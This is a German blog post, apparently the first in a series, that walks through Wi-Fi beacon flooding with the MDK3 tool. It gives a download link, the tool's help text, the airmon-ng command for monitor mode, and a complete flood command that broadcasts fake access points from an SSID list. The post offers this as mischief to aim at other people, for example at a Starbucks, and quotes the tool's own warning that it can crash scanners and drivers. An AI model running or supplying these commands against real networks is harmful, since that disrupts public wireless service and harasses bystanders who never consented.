MDK3, Teil 1: Beacon Flooding – ein schnurloser Schabernack

In diesem und einigen nachfolgenden Posts werden wir einige Möglichkeiten des „schnurlosen Schabernacks und der chaotischen Freizeitgestaltung“ (Weyert,2015,290f.) kennenlernen.

WLAN

Dazu nutzen wir MDK3, ein sehr vielfältiges Tool, das beispielsweise MAC-Filter brechen und versteckte SSIDs entlarven kann (Weyert, 2015, 197ff.). Hier lernen wir jedoch zunächst die Kunst des Beacon Flooding.

Als Beacons werden kleine, ständig versandte Datenpakete im Wireless Local Area Network (WLAN) bezeichnet. Flooding (engl. überfluten)bezeichnet das Überschwemmen eines Netzwerks mit Paketen. In unserem Fall werden die in der Umgebung befindlichen WLAN-Teilnehmer mit unzähligen nicht-existenten Hotspots überflutet.

Standardmässig ist MDK3 auf den Linux-Distributionen Kali und Backtrack vorhanden. Für andere Distributionen kann es als Tarball unter folgendem Link heruntergeladen werden:

http://www.filewatcher.com/m/mdk3-v6.tar.bz2.213279-0.html

Die grundlegenden Parameter von MDK3 werden bei einem einfachen Aufruf aufgelistet:

mdk3

Weitere Hilfe findet sich über:

mdk3 –fullhelp

Informationen zu einem spezifischen Penetration Test findet man mit

mdk3 –help

gefolgt vom entprechenden Parameter (b,a,p,d,m oder x). In unserem Beispiel wird dies der Parameter b sein:
mdk3 –help b
b   – Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
      OPTIONS:
      -n <ssid>
         Use SSID <ssid> instead of randomly generated ones
      -f <filename>
         Read SSIDs from file
      -v <filename>
         Read MACs and SSIDs from file. See example file!
      -d
         Show station as Ad-Hoc
      -w
         Set WEP bit (Generates encrypted networks)
      -g
         Show station as 54 Mbit
      -t
         Show station using WPA TKIP encryption
      -a
         Show station using WPA AES encryption
      -m
         Use valid accesspoint MAC from OUI database
      -h
         Hop to channel where AP is spoofed
         This makes the test more effective against some devices/drivers
         But it reduces packet rate due to channel hopping.
      -c <chan>
         Fake an AP on channel <chan>. If you want your card to hop on
         this channel, you have to set -h option, too!
      -s <pps>
         Set speed in packets per second (Default: 50)

Zunächst muss der eigene Wireless Adapter jedoch in den Monitor Mode versetzt werden. Im Gegensatz zum Promiscuous Mode können dadurch alle möglichen Frames weitergeleitet werden, nicht nur die des Netzwerks, mit dem der Client momentan verbunden ist. Die verwendete Schnittstelle muss also auf jeden Fall den Monitor Mode unterstützen.

Die WLAN-Karte lässt sich beispielsweise mit dem Tool Airmon-ng aus
der Aircrack-ng-Suite ganz einfach in den Monitor Mode und wieder
zurück in den Managed Mode schalten. Ein Interface wlan0 lässt sich
durch folgenden Aufruf im Monitor Mode aktivieren:

airmon-ng start wlan0

Nun können wir Pakete aussenden, die in der Wifi-Terminologie als
sog. „Bacon Frames“ bezeichnet werden. Dies ist eines der  „Management Frames“ im IEEE 802.11, welches alle Informationen
über das Netzwerk enthält und periodisch ausgesendet wird, um die Anwesenheit eines WLANs zu signalisieren. „Bacon Frames“ werden also durch sog. Access Points (APs) ausgesendet. Der SSID (Service Set Identifier) ist dabei der öffentliche Name des Netzwerkes.

Der Parameter b von MDK3 verweist nun auf den Beacon Flood Mode.
Dieser ermöglicht nicht nur den Namen eines „falschen“ Frames
„in die Luft zu senden“, sondern durch eine ganze Liste an SSIDs
zu kreisen uns so ein wahres SSID-Feuerwerk zu erzeugen.

Diese Liste kann ganz einfach in einem Text-File gespeichert werden,
beispielsweise unter dem Namen ssid.txt. Eine Auswahl an möglichen
Namen findet sich beispielsweise in der Statistik der häufigsten
SSIDs unter wigle.net oder alternativ erfindet man einfach selber
phantasievolle Namen, die man den schnurlosen Mitmenschen
unter die Nase reiben will… 😉

mdk3 wlan0mon b -f /home/dave/hacking/ssid.txt -w -g -m -s 50

Die Option -f erwartet als Parameter einen Verweis auf die SSID-Liste,
-w täuscht eine WEP-Verschlüsselung vor, -g eine Übertragungsrate von 54 MBit/s und -m eine valide MAC-Adresse, -s ist für die zeitliche Taktung verantwortlich.

So, nun macht der nächste Starbucks-Besuch doch schon wesentlich mehr Spass… ;-).

Siehe auch:

Andreas Weyert: Hacking mit Kali. München, 2015.

 

Beacons Beacons Everywhere: Using MDK3 for SSID Flood

Hinterlasse einen Kommentar